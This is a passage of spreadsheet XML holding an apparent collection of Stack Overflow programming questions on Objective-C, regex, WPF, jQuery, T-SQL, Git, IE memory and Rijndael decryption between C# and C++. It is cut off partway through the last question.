    <t xml:space="preserve">&lt;p&gt;I have a method that varies by a single method call inside, and I'd like to pass the method/signature of the method that it varies by as an argument... is this possible in Objective C or is that too much to hope for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular Exp instead of string split</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;hi 
I had an exam two days before one of the questions was to replace the letters before the @ with a new names&lt;/p&gt;
&lt;p&gt;so in the exam paper the we had array = "toto@yahoo.com","mimi@yahoo.com".soso@yahoo.com"
so we sholud take the toto mimi soso and replace them with diffrent names what i did is to split the string and take the first four letters and thank god i got the mark .&lt;/p&gt;
&lt;p&gt;I was thinking what if the number of letters befor the @ was not fixed
what other ways i can do ? Reg Exp or is there a diffrent way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I play a youtube video in swfloader?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I embed a youtube video in my air application. It loaded and played well, but I cannot play more than one video at the time, only one video is played at the time, do you know why?
The code is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;url:String = "http://in.youtube.com/v/fVGk5qm6Mac&amp;amp;hl=en&amp;amp;fs=1";    
             //texturl.text=url;
            swfloader.load(url)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Keeping same session with different user-agents</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to use the same session on different user-agents. I have a flash app that is generating a new session id on posting data to myHandler.ashx ( same happens on aspx ). Am i missing a trick here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does anybody actually use the PSP (Personal Software Process)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been reading a bit about this recently but it looks to be a bit heavy. Does anybody have real world experience using it?&lt;/p&gt;
&lt;p&gt;Are there any light weight alternatives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET AJAX - Check for async postback via JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know the script necessary to check to see if you are in a anync postback via JavaScript?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Newsletter: How is it possible to determine how many people opened the e-mail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Exact duplicate of &lt;a href="http://stackoverflow.com/questions/185204/is-there-a-way-to-determine-whether-an-e-mail-reaches-its-destination"&gt;http://stackoverflow.com/questions/185204/is-there-a-way-to-determine-whether-an-e-mail-reaches-its-destination&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Hi all,&lt;/p&gt;
&lt;p&gt;I heard that it's possible to determine how many people opened a newsletter and analyze WHEN they opened the mail.&lt;/p&gt;
&lt;p&gt;I just wanted to know how that's possible... is it necessary to generate a "read confirmation" or is such an analysis possible without letting the recipient know?&lt;/p&gt;
&lt;p&gt;Thanks a lot for your input...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Network Programming: to maintain sockets or not?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently translating an API from C# to Java which has a network component.&lt;/p&gt;
&lt;p&gt;The C# version seems to keep the input and output streams and the socket open for the duration of its classes being used.&lt;/p&gt;
&lt;p&gt;Is this correct?&lt;/p&gt;
&lt;p&gt;Bearing in mind that the application is sending commands and receiving events based on user input, is it more sensible to open a new socket stream for each "message"?&lt;/p&gt;
&lt;p&gt;I'm maintaining a ServerSocket for listening to the server throwing events but I'm not so sure that maintaining a Socket and output stream for outbound comms is such a good idea.&lt;/p&gt;
&lt;p&gt;I'm not really used to Socket programming.  As with many developers I usually work at the application layer when I need to do networking and not at the socket layer, and it's been 5 or 6 years since I did this stuff at university.&lt;/p&gt;
&lt;p&gt;Cheers for the help. I guess this is more asking for advice than for a definitive answer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to assign alt + f1 key to an opened Windows application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I usually have more then 10 opened application windows. When I write code I need to switch fast between a browser, an IDE and terminal windows. Alt + tab is too slow, too many windows to choose from.&lt;/p&gt;
&lt;p&gt;Virtual desktop is a work around for me. On a first desktop I keep browser, on a second IDE, etc. So I am able to switch fast between my most important applications.&lt;/p&gt;
&lt;p&gt;And the question. Is there an utility for Windows XP / Vista which allows to assign a keyboard shortcut like alt + f1 .. f10 to an opened application window? &lt;/p&gt;
&lt;p&gt;UPDATE: All programs I've found allow to define a shortcut to an application. E.g. they will open new instance of Firefox instead of switch to an opened one. Closest to what I need is &lt;a href="http://insentient.net/" rel="nofollow"&gt;Switcher&lt;/a&gt;. It displays big thumbnails of all open windows with assigned numbers to press.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>screen scraping technique using php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to screen scrape a particular website. I need to log in to a website and then scrape the inner information.
How could this be done? &lt;/p&gt;
&lt;p&gt;Please guide me. &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate: &lt;a href="http://stackoverflow.com/questions/26947/how-to-implement-a-web-scraper-in-php"&gt;How to implement a web scraper in PHP?&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DQL return files in a Cabinet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using DQL I want to return all the documents under the Cabinet &lt;em&gt;test&lt;/em&gt;. How would I go about writing a query to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is there no Linq method to return distinct values by a predicate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get the distinct values in a list, but not by the standard equality comparison.&lt;/p&gt;
&lt;p&gt;What I want to do is something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return myList.Distinct( (x, y) =&amp;gt; x.Url == y.Url );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't, there's no extension method in Linq that will do this - just one that takes an &lt;code&gt;IEqualityComparer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I can hack around it with this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return myList.GroupBy( x =&amp;gt; x.Url ).Select( g =&amp;gt; g.First() );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that seems messy. It also doesn't quite do the same thing - I can only use it here because I have a single key.&lt;/p&gt;
&lt;p&gt;I could also add my own:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static IEnumerable&amp;lt;T&amp;gt; Distinct&amp;lt;T&amp;gt;( 
    this IEnumerable&amp;lt;T&amp;gt; input, Func&amp;lt;T,T,bool&amp;gt; compare )
{
    //write my own here
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that does seem rather like writing something that should be there in the first place.&lt;/p&gt;
&lt;p&gt;Anyone know why this method isn't there?&lt;/p&gt;
&lt;p&gt;Am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>script to save file as unicode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you know any way that I could programmatically or via scrirpt transform a set of text files saved in ansi character encoding, to unicode encoding?&lt;/p&gt;
&lt;p&gt;I would like to do the same as I do when I open the file with notepad and choose to save it as an unicode file.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to handle null objects in XML coming from SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a stored procedure that returns an object as XML. How do I handle the case where the object doesn't exist?&lt;/p&gt;
&lt;p&gt;I can't return null or empty string as the XmlReader complains that it is not valid XML.&lt;/p&gt;
&lt;p&gt;If I return an empty Tag, how do I tell if it is just an empty object or no object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In XAML style, how to change solid background to gradient?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a MainResources.xaml file in which I have a style that defines how each of my windows in my application look:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;Style x:Key="MainBorderStyle" TargetType="{x:Type Border}"&amp;gt;
    &amp;lt;Setter Property="Background" Value="WhiteSmoke" /&amp;gt;
    &amp;lt;Setter Property="BorderBrush" Value="LightGray" /&amp;gt;
    &amp;lt;Setter Property="BorderThickness" Value="1" /&amp;gt;
    &amp;lt;Setter Property="CornerRadius" Value="5" /&amp;gt;
    &amp;lt;Setter Property="SnapsToDevicePixels" Value="True" /&amp;gt;
  &amp;lt;/Style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead of "WhiteSmoke" I want my background to be this gradient:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;LinearGradientBrush&amp;gt;
        &amp;lt;GradientStop Color="#ccc" Offset="0"/&amp;gt;
        &amp;lt;GradientStop Color="#bbb" Offset="1"/&amp;gt;
    &amp;lt;/LinearGradientBrush&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But the following attempt causes VS2008 to tell me "Style setters do not support child elements":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Style x:Key="MainBorderStyle" TargetType="{x:Type Border}"&amp;gt;
    &amp;lt;Setter Property="Background"&amp;gt;
        &amp;lt;LinearGradientBrush&amp;gt;
            &amp;lt;GradientStop Color="#ccc" Offset="0"/&amp;gt;
            &amp;lt;GradientStop Color="#bbb" Offset="1"/&amp;gt;
        &amp;lt;/LinearGradientBrush&amp;gt;
    &amp;lt;/Setter&amp;gt;
    &amp;lt;Setter Property="BorderBrush" Value="LightGray" /&amp;gt;
    &amp;lt;Setter Property="BorderThickness" Value="1" /&amp;gt;
    &amp;lt;Setter Property="CornerRadius" Value="5" /&amp;gt;
    &amp;lt;Setter Property="SnapsToDevicePixels" Value="True" /&amp;gt;
&amp;lt;/Style&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the correct way to put a gradient color as the background for this style?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where is Python used? I read about it a lot on Reddit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have downloaded the Pyscripter and learning Python. But I have no Idea if it has any job value , especially in India. I am learning Python as a Hobby. But it would be comforting to know if Python programmers are in demand in India.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disable messages in SQL2008 result set</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;further to &lt;a href="http://stackoverflow.com/questions/483787/is-there-a-bug-in-sqldatareader-hasrows-when-running-against-sql-server-2008" rel="nofollow" title="these"&gt;these&lt;/a&gt; &lt;a href="http://stackoverflow.com/questions/197220/sqldatareader-hasrows-returns-false-since-sql-2008-upgrade"&gt;two&lt;/a&gt; questions, is there a way to disable the messages that may get sent along with the resultset in SQL2008?&lt;/p&gt;
&lt;p&gt;(please note this is nothing to do with the ANSI_WARNINGS setting. &lt;strong&gt;Or NOCOUNT&lt;/strong&gt;.)&lt;/p&gt;
&lt;p&gt;Thanks for any help.&lt;/p&gt;
&lt;p&gt;Edit: It's not a problem with compatibility settings or table owners. &lt;strong&gt;And it's nothing to do with NOCOUNT&lt;/strong&gt;. Trust me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery If DIV Doesn't Have Class "x"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In jQuery I need to do an if statement to see if $this doesn't contain the class '.selected'.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(".thumbs").hover(function(){
$(this).stop().fadeTo("normal", 1.0);
},function(){
$(this).stop().fadeTo("slow", 0.3);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically when this function is run (on hover) I don't want to perform the fades if the class '.selected' has been appended to the div, this will mean that the image will be at full opacity to signify that it's selected. Searched on Google to no luck even though it's a simple question of how to use an IF statement...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET assemblies spanning multiple files and unit testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone point me to some information on .NET assemblies spanning multiple files?&lt;/p&gt;
&lt;p&gt;I've found this remark on MSDN (&lt;a href="http://msdn.microsoft.com/en-us/library/ms973231.aspx#assenamesp_topic4" rel="nofollow"&gt;here&lt;/a&gt;):&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Although it's technically possible to create assemblies that span
  multiple files, you're not likely to use this technology in most
  situations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm asking because I have the business logic and the unit tests for it in separate projects, and I'd like to test some internal classes (which are not accessible from the unit tests) - so I thought I'd try and merge the two into a single assembly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the default value of a type in a non-generic way?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know the "default" keyword returns the default value of a statically determined type, as shown for instance in &lt;a href="http://stackoverflow.com/questions/367378/returning-a-default-value-c"&gt;this question&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, given an instance of a type, is there a simple way to get the default value of this type, dynamically ?
The only way I found while googling is &lt;a href="http://weblogs.asp.net/avnerk/archive/2006/05/21/Non_2D00_generic-default-values-in-C_23003F00_-Why-not_3F002100_.aspx" rel="nofollow"&gt;this&lt;/a&gt; :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static object DefaultValue(Type myType)
{
    if (!myType.IsValueType)
        return null;
    else
        return Activator.CreateInstance(myType);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'd like to avoid the Activator class if possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a downloadable document available that encapsulates the core rules enforced by StyleCop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a downloadable document available that encapsulates the core rules enforced by StyleCop? &lt;/p&gt;
&lt;p&gt;We've settled on C#, and we're going to be using FxCop and StyleCop to enforce design and style guidelines. To help get folks ramped up to speed, we'd like to make sure they have printed versions of the reference materials on hand as &lt;em&gt;casual reading material,&lt;/em&gt; so I was hoping that there were PDF versions of the rules references around.&lt;/p&gt;
&lt;p&gt;My searches so far for the StyleCop rules reference have been fruitless. If anyone knows if these rules are available as a consolidated document (either as PDF, XPS, or some other single downloadable reference), I'd very much appreciate it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I determine property types using reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would I test a property of a type to see if it is a specified type?&lt;/p&gt;
&lt;p&gt;EDIT: My goal is to examine an assembly to see if any of the types in that assembly contain  properties that are MyType (or inherited from MyType).&lt;/p&gt;
&lt;p&gt;Here is the track I've gone down...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AssemblyName n = new AssemblyName();
n.CodeBase = "file://" + dllName;
Assembly a = AppDomain.CurrentDomain.Load(n);
foreach (Type t in a.GetTypes())
    foreach (PropertyInfo pi in t.GetProperties())
        if ( pi.PropertyType is MyType ) // warning CS0184
            Console.WriteLine("Found a property that is MyType");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This compiles with warning CS0184: The given expression is never of the provided ('MyType') type&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hook application with .NET to capture double click events</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I hook an application so that I can find out when the mouse is double clicked within it?&lt;/p&gt;
&lt;p&gt;Can this be done in .NET?&lt;/p&gt;
&lt;p&gt;Are there anythings I should be careful about? (crashing the other application, for instance)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will there ever be a solution for global events in .NET applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In our program we use Microsoft's UserActivityHook.dll to determine when a user of our Windows Forms app has been idle for more than X seconds.  This allows us to replicate an 'auto-away' behavior much like MSN/Live Messanger when there has been no keyboard or mouse events after a certain amount of time.&lt;/p&gt;
&lt;p&gt;Ive always wondered why .NET (to my knowledge) has not implemented a way to interact with such global events.  It seems that the FileSystemWatcher class is similar, in that it notifies the program of file changes that occur outside the program, why not a similar function for mouse/keyboard events?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Return background color of selected cell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a spreadsheet which cells in are colored meaningfully.&lt;/p&gt;
&lt;p&gt;Does any body know how i can return the background color value of a current cell in Excel sheet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>T-SQL 2005: Suppress the output of the results set</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some stored procedures which are used for generating Reports.  I am trying to build a report dashboard that will show how many records are on each report.&lt;/p&gt;
&lt;p&gt;The SPs are detailed in a table which details in which order they should be run.&lt;/p&gt;
&lt;p&gt;I have a dashboard SP in which I am using Cursor to go through the database table, execute each report SP and then saving the @@rowcount into a temp table which forms the basis of the dashboard.&lt;/p&gt;
&lt;p&gt;I can turn off the row count using set rowcoun off at the top of each SP, but I can't find a way to stop the results set being retured from the EXEC sp_my_sp command.&lt;/p&gt;
&lt;p&gt;&lt;PRE&gt;
WHILE @@FETCH_STATUS = 0
BEGIN
    declare @x as int
    exec @SP_name @x OUT
    select @x
    insert into @results (Short___name,Records) values (@shortname,@x)
    FETCH NEXT FROM myCursor INTO @ShortName, @SP_Name,@Group,@Order
END 
&lt;/PRE&gt;&lt;/p&gt;
&lt;p&gt;Somewhere in there I need to suppress or redirect the output.  I don't want to do it inside the actual report SP.&lt;/p&gt;
&lt;p&gt;The only solution I have come up with so far is to add an input parameter to each SP to say whether it is being run for the dashboard or for the report.  Instead of returning the results set directly, insert it into an in-memory table and and then report the in-memory table &lt;B&gt;ONLY&lt;/B&gt; if we are running for reports - not nice as someone has to remember to do it for each new SP&lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
&lt;p&gt;Obiron&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Classic database insert problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL database which i use to store some info and every record has a unique id generated by the database. MY program is written in flash and runs over the web, the program runs fine and it inserts records into the database and pulls the idnumber of the last record and displays it for user, my question is though how do i handle multiple concurrent entries because the program will be used by multiple users and chances are there will be concurrent  inserts into the database so how would i be able to identify the correct unique id numbers for users&lt;/p&gt;
&lt;p&gt;here is the code for inserting into the database&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$query = "INSERT into $tablename (grade,school,country) VALUES ('$datarray[0]','$datarray[1]','$datarray[2]')";
$result = mysql_query($query) 
		or die("no rows selected");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and after that i load another php file on the second in my flash file to pull the id for that record and display it here is the code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$query = "SELECT max(id) from $tablename";
$result = mysql_query($query) 
		or die("no rows selected");
$row = mysql_fetch_array($result); // extracts one row
echo  "id=$row[0]";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;what do i need to do to get the correct id for that record?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google's Imageless Buttons</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There have been a few articles recently about Google's new imageless buttons:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stopdesign.com/archive/2009/02/04/recreating-the-button.html"&gt;http://stopdesign.com/archive/2009/02/04/recreating-the-button.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stopdesign.com/eg/buttons/3.0/code.html"&gt;http://stopdesign.com/eg/buttons/3.0/code.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stopdesign.com/eg/buttons/3.1/code.html"&gt;http://stopdesign.com/eg/buttons/3.1/code.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://gmailblog.blogspot.com/2009/02/new-ways-to-label-with-move-to-and-auto.html"&gt;http://gmailblog.blogspot.com/2009/02/new-ways-to-label-with-move-to-and-auto.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I really like how these new buttons work in Gmail.  How can I use these or similar buttons on my site?  Are there any open source projects with a similar look &amp;amp; feel?&lt;/p&gt;
&lt;p&gt;If I wanted to roll my own button package like this using JQuery/XHTML/CSS, what elements could I use?  My initial thoughts are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Standard &lt;code&gt;&amp;lt;input type="button"&amp;gt;&lt;/code&gt; with css to improve the look (the design article talked mostly about the css/imges involves.)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Jquery javascript to bring up a custom dialog rooted to the button on the "onclick" event which would have &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tags in them and a search bar for filtering?  Would a table layout for that popup be sane?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm terrible at reverse engineering things on the web, what are some of the tools that I could use to help reverse engineer these buttons?  Using Firefox's web developer toolbar I can't really see the css or javascript (even if it is minified) that is used on the buttons popup dialogs.  What browser tool or other method could I use to peek at them and get some ideas?&lt;/p&gt;
&lt;p&gt;I'm not looking to steal any of Google's IP, just get an idea of how I could create similar button functionality.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make an existing Git branch track a remote branch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know how to make a new branch that tracks remote branches, but &lt;strong&gt;how do I make an existing branch track a remote branch?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I know I can just edit the &lt;code&gt;.git/config&lt;/code&gt; file, but it seems there should be an easier way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE and Memory accumulation in Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is the test URL&lt;/p&gt;
&lt;p&gt;&lt;a href="http://edventures.com/temp/divtest.php" rel="nofollow"&gt;http://edventures.com/temp/divtest.php&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Procedure:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Close all IE instances.&lt;/li&gt;
&lt;li&gt;Open the URL in IE7&lt;/li&gt;
&lt;li&gt;Open the task manager, look for  memory consumed by IE&lt;/li&gt;
&lt;li&gt;Now click on Create button,&lt;/li&gt;
&lt;li&gt;Watch the memory it will jump up by about 2K&lt;/li&gt;
&lt;li&gt;Now click on Destroy button and the DIV will be destroyed but the memory remains the same.&lt;/li&gt;
&lt;li&gt;You can try it repeatedly and memory just adds up.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there any way to fix this?  Any way to call Garbage collector forcefully without reloading the window?&lt;/p&gt;
&lt;p&gt;I am under assumption that when I remove DIV the memory will be freed but does not seem to work that way.&lt;/p&gt;
&lt;p&gt;Please let me know any fix to this.&lt;/p&gt;
&lt;p&gt;Thanks for your help.&lt;/p&gt;
&lt;p&gt;Suhas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS max-height not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simply problem where I need a div to expand to fit its contents unless the height reaches a certain size, when I want the div to scroll vertically instead. As a test, I created a page containing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="width:300px;max-height:25px;background-color:green;overflow:auto;"&amp;gt;
    1&amp;lt;br /&amp;gt;
    2&amp;lt;br /&amp;gt;
    3&amp;lt;br /&amp;gt;
    4&amp;lt;br /&amp;gt;
    5
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, the max-height doesn't seem to work. What am I doing wrong?&lt;/p&gt;
&lt;p&gt;I am using IE7.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does R have quote-like operators like Perl's qw()?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know if R has quote-like operators like Perl's &lt;code&gt;qw()&lt;/code&gt; for generating character vectors? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Type of Projects where Unit Testing is useless</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you believe that Unit Testing (and test driven development) must be done under any set of circumstances or should there be some exceptions. 
I've been working on the type of projects lately where I can't see how Unit Testing would be useful or improve design, quality of code, etc. One type of project is PDF reports generator which takes aggregate data (values already calculated and QAed) and outputs it to a PDF report file. Another type is straight-forward CRUD applications using 3rd party ORM tool. 
I can see how someone could make an argument for using Unit Testing for CRUD application, but it's a lot of unnecessary and time consuming setup work, like stabbing out all the calls to a database and mocking business objects, etc. when at the end all you need to know if something happened to the DB.
So when one should use or avoid Unit Testing?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing a work item between threads (Java)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two threads. The producer is producing pieces of data (String objects), where the consumer processes these strings. The catch is that my application only needs the most recent data object to be processed. In other words, if the producer managed to produce two strings "s1" and then "s2" then I want the consumer to process only "s2". "s1" can be safely discarded.&lt;/p&gt;
&lt;p&gt;Of course there's no problem implementing a class that realizes this behavior, but I want to use a standard mechanism from java.util.concurrent (if such a mechanism exists). Note that  SynchronousQueue is not a good solution: the consumer will block when enqueueing "s1" and will not get the chance to produce "s2".&lt;/p&gt;
&lt;p&gt;(In short, I am looking for a single-element collection with a blocking remove operation and a non-blocking set operation)&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to simulate Windows shutdown for debugging?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an issue with my application when Windows shuts down - my app isn't exiting nicely, resulting in the End Task window being displayed. How can I use the debugger to see what's going on? &lt;/p&gt;
&lt;p&gt;Is there a way to send the Windows shutdown message(s) to my application so it thinks Windows is shutting down, so I can see exactly how it behaves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculate final scores in a game relative to previous scores and other players</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Supposing a multi-player game, what you be the fairest way give final scores based on the previous scores of all players.&lt;/p&gt;
&lt;p&gt;For example, in a two player match, player A having two times the score of player B. "A" finishing first would not give him a lot of points; finishing last, he would lose quite a lot of points.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to have favicon / icon set when bookmarklet dragged to toolbar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've made myself a bookmarklet, and it functions just fine, but when added to a toolbar in Opera or Firefox, it just takes on the default bookmark icon for the browser (a globe and a star, respectively).  My site has a favicon, and the window, tab and even [site] bookmark uses the favicon I've specified.  Just not my bookmarklet.&lt;/p&gt;
&lt;p&gt;How can I code my site or bookmarklet so that the bookmarklet gets the favicon, too?&lt;/p&gt;
&lt;p&gt;I'm aware of various manual hackery techniques users can use to set the favicon after the fact, but those are undesirable solutions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to stop onkeyup event being fired when an alert box is cleared with the enter key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my problem...&lt;/p&gt;
&lt;p&gt;I have a text field which uses the javascript onkeyup event to do some "quiet" validation with a tick or cross if the value is valid.&lt;/p&gt;
&lt;p&gt;When the enter key is pressed, it does the same validation, but with an alert box advising of any problems.  If the enter key is used to clear the alert box, this press of the enter key refires the onkeyup event, which restarts the validation and the alert boxes again.&lt;/p&gt;
&lt;p&gt;As soon as I click the OK in the alert box, this naturally stops.&lt;/p&gt;
&lt;p&gt;Is there any way I can detect that the enter press was from the alert box?&lt;/p&gt;
&lt;p&gt;This definitely happens in opera, safari and firefox.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Examples of good Java desktop applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;More of a wiki list/collection, I'm looking for a list of good Java desktop apps. I've added a couple below to get started. Please list the framework/widget toolkit being used if it's know as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good way to call a CGI script from a PHP script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I saw that there is a &lt;strong&gt;virtual()&lt;/strong&gt; function in PHP that will call a CGI script, but is that the best way?  Can I pass any parameters to that scripts as well?&lt;/p&gt;
&lt;p&gt;I saw some examples using &lt;strong&gt;&lt;code&gt;file_get_contents()&lt;/code&gt;&lt;/strong&gt; or &lt;strong&gt;include()&lt;/strong&gt; and passing in the URL of a CGI script, but that feels like a hack.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Decrypting RijndaelManaged Encrypted strings with CryptDecrypt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok I'm trying to use the Win32 Crypto API in C++ to decrypt a string encrypted in C# (.NET 2) with the RijndaelManaged Class.  But I'm having no luck at all i get jibberish or a bad data Win32 error code.  All my keys, IV and salt match, I've looked in the watch for both test apps.  I've spent all say looking at it and I'm officialy stuck.&lt;/p&gt;
&lt;p&gt;Anyway here is the C#&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(GetPassPhrase(), salt, 1000);
        RijndaelManaged rijndael = new RijndaelManaged();
        rijndael.BlockSize = 128;
        rijndael.KeySize = 256;
        rijndael.Mode = CipherMode.CBC;
        rijndael.Key = pdb.GetBytes(m_KeySize);
        rijndael.IV = GetIV(iv);
        ICryptoTransform encryptor = rijndael.CreateEncryptor(); 
        MemoryStream msEncrypt = new MemoryStream();
        CryptoStream csEncrypt = new CryptoStream(msEncrypt, encryptor, CryptoStreamMode.Write);
        Byte[] encryptedBytes = null;
        Byte[] toBeEncrypted = UnicodeEncoding.Unicode.GetBytes(value);
        csEncrypt.Write(toBeEncrypted, 0, toBeEncrypted.Length);
        csEncrypt.FlushFinalBlock();
        encryptedBytes = msEncrypt.ToArray();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The C++ to decrypt it is:&lt;/p&gt;
